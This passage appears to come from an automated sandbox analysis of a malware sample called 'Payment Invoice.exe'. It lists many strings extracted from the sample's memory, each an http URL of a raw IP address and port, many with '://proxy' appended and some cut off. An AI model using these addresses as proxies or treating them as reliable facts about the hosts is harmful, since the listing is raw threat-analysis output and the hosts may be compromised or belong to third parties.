                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://78.30.128.10:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.165.246:8989
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.106.165.246:8989://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.177:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.177:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.181:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.119.181:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.196.145:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.110.52.252:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.122.230.20:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.177.29:21972
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.143.177.29:21972://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.7.101.98:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://79.7.101.98:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.132.204:18080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.132.204:18080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.142.3.145:3306://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.209.255.13:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.150.195:26666://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.58.56:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.210.8.157:19001://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.211.4.215x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:4506://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:7779://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.213.128.90:808://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.218.100.120:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.97.248:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631816E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.152.158:55555://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.239.209:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.178.5:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.85.6:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.242.85.6:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.13.43.193
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.13.43.193://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.13.43.193:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.150.50.226:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.191.169.79:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.194.38.106:3333://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.228.235.6:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.229.194.203:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.229.194.203:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.241.44.34:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.241.44.34:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163171E0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.251.219.40:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.251.219.40:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.51.7.66:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163183B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.65.28.57:30962://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.72.68.247:8082://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.78.64.70:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.104.43:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.104.43:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.134.57.82:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.134.57.82:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E4A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.236.152:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.236.152:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.19.3.249:10080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.19.3.249:10080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.21.82.116:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.21.82.116:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.157.134:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.157.134:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.113.157.122:31280
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.113.157.122:31280://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.59:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.137.244.59:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.6:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.147.153.6:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.218.176.25:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:15464://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:4985
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:4985://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.118.30.224:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.126.54.155:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.126.54.155:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.142.161.30
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.142.161.30://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.142.161.30:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.143.24.66://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.151.4.172:47036
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.151.4.172:47036://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.220.168.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.220.168.57:10102
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.220.168.57:10102://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631960A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.234.76.155:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.234.76.155:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.15:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.15:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.56.15.57:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.56.15.57:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.35.129:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.35.129:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.235:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.235:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.240:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.240:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.241:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.241:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.204.40.155:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631737F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.204.40.155:8080://proxyH
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.23.54.47:47764
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.23.54.47:47764://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.188.138:8111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.188.138:8111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.23
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.109.104.100:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.109.104.100:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.109.104.100:9090x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.113.55.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.113.55.123:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.113.55.123:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.116.120.106:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.116.120.106:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.91:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.91:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.91:8080://proxy2m
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.60.162:8080
